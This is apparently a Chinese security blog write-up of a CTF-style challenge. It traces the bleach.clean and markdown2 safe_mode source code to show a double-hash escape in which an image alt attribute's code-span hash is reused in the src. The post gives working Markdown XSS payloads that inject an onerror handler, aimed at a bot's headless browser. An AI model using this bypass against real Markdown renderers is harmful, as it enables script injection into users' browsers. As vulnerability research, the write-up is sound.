Markdown 双哈希逃逸：Bleach 清洗后 markdown2 SafeMode 的 Alt 属性 XSS 完整链路:)#

adoraki!!!!!!!!!!

就按照闲谈学习去完成这个吧，全链坐实

无容置疑的点只有两个，就是需要让markdown语法和js进行联系

以及让bot的无头浏览器执行我们的js

我们看代码片段

1
safe_md = bleach.clean(
2
        md,
3
        tags=[],
4
        attributes={},
5
        protocols=[],
6
        strip=True,
7
        strip_comments=True,
8
    )

直接进行追溯

这个函数传的参数很多都是默认的

1
def clean(
2
    text,
3
    tags=ALLOWED_TAGS,#[]
4
    attributes=ALLOWED_ATTRIBUTES,#{}
5
    protocols=ALLOWED_PROTOCOLS,#[]
6
    strip=False,
7
    strip_comments=True,
8
    css_sanitizer=None,
9
):
10

11
    cleaner = Cleaner(
12
        tags=tags,
13
        attributes=attributes,
14
        protocols=protocols,
15
        strip=strip,
16
        strip_comments=strip_comments,
17
        css_sanitizer=css_sanitizer,
18
    )
19
    return cleaner.clean(text)

继续跟

1
def clean(self, text):
2
        if not isinstance(text, str):
3
            message = (
4
                f"argument cannot be of {text.__class__.__name__!r} type, "
5
                + "must be of text type"
6
            )
7
            raise TypeError(message)
8

9
        if not text:
10
            return ""
11

12
        dom = self.parser.parseFragment(text)#text是的
13
        filtered = BleachSanitizerFilter(
14
            source=self.walker(dom),
15
            allowed_tags=self.tags,
16
            attributes=self.attributes,
17
            strip_disallowed_tags=self.strip,
18
            strip_html_comments=self.strip_comments,
19
            css_sanitizer=self.css_sanitizer,
20
            allowed_protocols=self.protocols,
21
        )
22

23
        # Apply any filters after the BleachSanitizerFilter
24
        for filter_class in self.filters:
25
            filtered = filter_class(source=filtered)
26

27
        return self.serializer.render(filtered)

其中parseFragment(text)是讲其解析为良好的树形结构，暂时不看

看看BleachSanitizerFilter

1
def sanitize_token(self, token):
2
        """Sanitize a token either by HTML-encoding or dropping.
3

4
        Unlike sanitizer.Filter, allowed_attributes can be a dict of {'tag':
5
        ['attribute', 'pairs'], 'tag': callable}.
6

7
        Here callable is a function with two arguments of attribute name and
8
        value. It should return true of false.
9

10
        Also gives the option to strip tags instead of encoding.
11

12
        :arg dict token: token to sanitize
13

14
        :returns: token or list of tokens
15

16
        """
17
        token_type = token["type"]
18
        if token_type in ["StartTag", "EndTag", "EmptyTag"]:
19
            if token["name"] in self.allowed_tags:
20
                return self.allow_token(token)
21

22
            elif self.strip_disallowed_tags:
23
                return None
24

25
            else:
26
                return self.disallowed_token(token)
27

28
        elif token_type == "Comment":
29
            if not self.strip_html_comments:
30
                # call lxml.sax.saxutils to escape &, <, and > in addition to " and '
31
                token["data"] = html5lib_shim.escape(
32
                    token["data"], entities={'"': "&quot;", "'": "&#x27;"}
33
                )
34
                return token
35
            else:
36
                return None
37

38
        elif token_type == "Characters":
39
            return self.sanitize_characters(token)
40

41
        else:
42
            return token

其实就是将html标签转为不支持的格式

然后直接转markdown，看看当markdown的safe标签的时候的过滤

html = Markup(markdown2.markdown(safe_md, safe_mode=“escape”))

1
def _sanitize_html(self, s: str) -> str:
2
        if self.safe_mode == "replace":
3
            return self.html_removed_text
4
        elif self.safe_mode == "escape":
5
            replacements = [
6
                ('&', '&amp;'),
7
                ('<', '&lt;'),
8
                ('>', '&gt;'),
9
            ]
10
            for before, after in replacements:
11
                s = s.replace(before, after)
12
            return s
13
        else:
14
            raise MarkdownError("invalid value for 'safe_mode': %r (must be "
15
                                "'escape' or 'replace')" % self.safe_mode)
16

17
    _inline_link_title = re.compile(r'''
18
            (                   # \1
19
              [ \t]+
20
              (['"])            # quote char = \2
21
              (?P<title>.*?)
22
              \2
23
            )?                  # title is optional
24
          \)$
25
        ''', re.X | re.S)
26
    _tail_of_reference_link_re = re.compile(r'''
27
          # Match tail of: [text][id]
28
          [ ]?          # one optional space
29
          (?:\n[ ]*)?   # one optional newline followed by spaces
30
          \[
31
            (?P<id>[^\[\]]*?)
32
          \]
33
        ''', re.X | re.S)
34

35
    _whitespace = re.compile(r'\s*')
36

37
    _strip_anglebrackets = re.compile(r'<(.*)>.*')

貌似核心不在这，我们回去跟text

在text最开始进markdown主函数的时候调用了convert

1
def convert(self, text: str) -> 'UnicodeWithAttrs':
2
        """Convert the given text."""
3
        # Main function. The order in which other subs are called here is
4
        # essential. Link and image substitutions need to happen before
5
        # _EscapeSpecialChars(), so that any *'s or _'s in the <a>
6
        # and <img> tags get encoded.
7

8
        # Clear the global hashes. If we don't clear these, you get conflicts
9
        # from other articles when generating a page which contains more than
10
        # one article (e.g. an index page that shows the N most recent
11
        # articles):
12
        self.reset()
13

14
        if not isinstance(text, str):
15
            # TODO: perhaps shouldn't presume UTF-8 for string input?
16
            text = str(text, 'utf-8')
17

18
        if self.use_file_vars:
19
            # Look for emacs-style file variable hints.
20
            text = self._emacs_oneliner_vars_pat.sub(self._emacs_vars_oneliner_sub, text)
21
            emacs_vars = self._get_emacs_vars(text)
22
            if "markdown-extras" in emacs_vars:
23
                splitter = re.compile("[ ,]+")
24
                for e in splitter.split(emacs_vars["markdown-extras"]):
25
                    if '=' in e:
26
                        ename, earg = e.split('=', 1)
27
                        try:
28
                            earg = int(earg)
29
                        except ValueError:
30
                            pass
31
                    else:
32
                        ename, earg = e, None
33
                    self.extras[ename] = earg
34

35
            self._setup_extras()
36

37
        # Standardize line endings:
38
        text = text.replace("\r\n", "\n")
39
        text = text.replace("\r", "\n")
40

41
        # Make sure $text ends with a couple of newlines:
42
        text += "\n\n"
43

44
        # Convert all tabs to spaces.
45
        text = self._detab(text)
46

47
        # Strip any lines consisting only of spaces and tabs.
48
        # This makes subsequent regexen easier to write, because we can
49
        # match consecutive blank lines with /\n+/ instead of something
50
        # contorted like /[ \t]*\n+/ .
51
        text = self._ws_only_line_re.sub("", text)
52

53
        # strip metadata from head and extract
54
        if "metadata" in self.extras:
55
            text = self._extract_metadata(text)
56

57
        text = self.preprocess(text)
58

59
        if self.safe_mode:
60
            text = self._hash_html_spans(text)
61

62
        # Turn block-level HTML blocks into hash entries
63
        text = self._hash_html_blocks(text, raw=True)
64

65
        # Strip link definitions, store in hashes.
66
        if "footnotes" in self.extras:
67
            # Must do footnotes first because an unlucky footnote defn
68
            # looks like a link defn:
69
            #   [^4]: this "looks like a link defn"
70
            text = self._strip_footnote_definitions(text)
71
        text = self._strip_link_definitions(text)
72

73
        text = self._run_block_gamut(text)
74

75
        if "footnotes" in self.extras:
76
            text = self._do_footnote_marker(text)
77
            text = self._add_footnotes(text)
78

79
        text = self.postprocess(text)
80

81
        text = self._unescape_special_chars(text)
82

83
        text = self._unhash_html_spans(text)
84
        if self.safe_mode:
85
            # return the removed text warning to its markdown.py compatible form
86
            text = text.replace(self.html_removed_text, self.html_removed_text_compat)
87

88
        do_target_blank_links = "target-blank-links" in self.extras
89
        do_nofollow_links = "nofollow" in self.extras
90

91
        if do_target_blank_links and do_nofollow_links:
92
            text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow noopener" target="_blank"\2', text)
93
        elif do_target_blank_links:
94
            text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="noopener" target="_blank"\2', text)
95
        elif do_nofollow_links:
96
            text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow"\2', text)
97

98
        if "toc" in self.extras and self._toc:
99
            if self.extras['header-ids'].get('mixed'):
100
                # TOC will only be out of order if mixed headers is enabled
101
                def toc_sort(entry):
102
                    '''Sort the TOC by order of appearance in text'''
103
                    match = re.search(
104
                        # header tag, any attrs, the ID, any attrs, the text, close tag
105
                        r'^<(h%d).*?id=(["\'])%s\2.*>%s</\1>$' % (entry[0], entry[1], re.escape(entry[2])),
106
                        text, re.M
107
                    )
108
                    return match.start() if match else 0
109

110
                self._toc.sort(key=toc_sort)
111
            self._toc_html = calculate_toc_html(self._toc)
112

113
            # Prepend toc html to output
114
            if self.cli or (self.extras['toc'] is not None and self.extras['toc'].get('prepend', False)):
115
                text = f'{self._toc_html}\n{text}'
116

117
        text += "\n"
118

119
        # Attach attrs to output
120
        rv = UnicodeWithAttrs(text)
121

122
        if "toc" in self.extras and self._toc:
123
            rv.toc_html = self._toc_html
124

125
        if "metadata" in self.extras:
126
            rv.metadata = self.metadata
127
        return rv

这一段是没有校验其他字段的

1
 if self.safe_mode:
2
            text = self._hash_html_spans(text)
3

4
        # Turn block-level HTML blocks into hash entries
5
        text = self._hash_html_blocks(text, raw=True)
6

7
        # Strip link definitions, store in hashes.
8

9
        text = self._strip_link_definitions(text)
10

11
        text = self._run_block_gamut(text)
12

13
        text = self.postprocess(text)
14

15
        text = self._unescape_special_chars(text)
16

17
        text = self._unhash_html_spans(text)

先看看_hash_html_spans

因为比较长，只截回调那一部分，也就是非函数而是调用的部分

1
code_hashes = {}
2
        text = self._code_span_re.sub(
3
            lambda m: self._hash_span(m.string[m.start(): m.end()], code_hashes),
4
            text
5
        )

因为md是reset的新状态，那么当_code_span_re这个正则被匹配的时候就会进行hash_span回调，

继续追溯

1
_code_span_re = re.compile(r'''
2
            (?<!\\)
3
            (`+)        # \1 = Opening run of `
4
            (?!`)       # See Note A test/tm-cases/escapes.text
5
            (.+?)       # \2 = The code block
6
            (?<!`)
7
            \1          # Matching closer
8
            (?!`)
9
        ''', re.X | re.S)
10
def _hash_span(self, text: str, hash_table: Optional[dict] = None) -> str:
11
        '''
12
        Wrapper around `_hash_text` that also adds the hash to `self.hash_spans`,
13
        meaning it will be automatically unhashed during conversion.
14

15
        Args:
16
            text: the text to hash
17
            hash_table: the dict to insert the hash into. If omitted will default to `self.html_spans`
18

19
        Returns:
20
            The hashed text
21
        '''
22
        key = _hash_text(text)
23
        if hash_table is not None:
24
            hash_table[key] = text
25
        else:
26
            self.html_spans[key] = text
27
        return key

跟hash

1
def _hash_text(s: str) -> str:
2
    return 'md5-' + sha256(SECRET_SALT + s.encode("utf-8")).hexdigest()[32:]
3

4
# Table of hash values for escaped characters:
5
g_escape_table = {ch: _hash_text(ch)
6
    for ch in '\\`*_{}[]()>#+-.!'}
7

8
# Ampersand-encoding based entirely on Nat Irons's Amputator MT plugin:
9
#   http://bumppo.net/projects/amputator/
10
_AMPERSAND_BODY_RE = r'#?[xX]?(?:[0-9a-fA-F]+|\w+);'
11
_AMPERSAND_RE = re.compile(r'&(?!%s)' % _AMPERSAND_BODY_RE)
12
_ESCAPED_AMPERSAND_RE = re.compile(r'(?:\\\\)*\\&(%s)' % _AMPERSAND_BODY_RE)

这里转hash，然后就是正常的图片转img标签。然后就是_unescape_special_chars

1
def _unescape_special_chars(self, text: str) -> str:
2
        # Swap back in all the special characters we've hidden.
3
        hashmap = tuple(self._escape_table.items()) + tuple(self._code_table.items())
4
        # html_blocks table is in format {hash: item} compared to usual {item: hash}
5
        hashmap += tuple(tuple(reversed(i)) for i in self.html_blocks.items())
6
        while True:
7
            orig_text = text
8
            for ch, hash in hashmap:
9
                text = text.replace(hash, ch)
10
            if text == orig_text:
11
                break
12
        return text

它用元组将hash换了回来

也就是一个md5对应的原本代码

在这里需要先明确

md的语法，也就是

1
![x](y)

这里的x是alt属性，y是src

但是有一点，它转hash转回来的时候只换了src，并没有换alt标签的东西，

所以alt的md5就会被直接泄露出来

1
result = (
2
    f'<img src="..."'
3
    f' alt="{self.md._hash_span(_xml_escape_attr(link_text))}"'   # ← 这里！
4
    ...
5
)

并且因为clean的缘故没法插入html标签

所以执行这个分两步

1
![`" onerror="alert(1)//`]()![a](`REPLACEME//`)

这个的" onerror="alert(1)//因为是alt标签，所以直接被转换为md5填充回来但是不会被替换

而REPLACEME//这一部分是src，它的md5最后会

1
orig_text = text
2
            for ch, hash in hashmap:
3
                text = text.replace(hash, ch)
4
            if text == orig_text:
5
                break
6
        return text

也就是转回来，并且这个md5是循环的，也就是说会直到无法转为止才会返回

如果说为啥不直接将这个放到()里，那是因为safe的模块会转义"",”等等内容

所以我们先用

1
![`" onerror="alert(1)//`]()![a](`REPLACEME//`)

将恶意代码的md5泄露出来，再二次填入REPLACEME//的这个地方

所以第二次是

1
![`" onerror="alert(1)//`]()![a](`md5-xxxxxxx`)

这样经过循环后md5就会被二次转为恶意代码，并且“包裹也就是

1
<img src="code&gt;" onerror="alert(1)////&lt;/code" alt="a" ... />

极其巧妙的截断

完结

萦梦sora~Nyaの安全Blog

Markdown 双哈希逃逸：Bleach 清洗后 markdown2 SafeMode 的 Alt 属性 XSS 完整链路:)#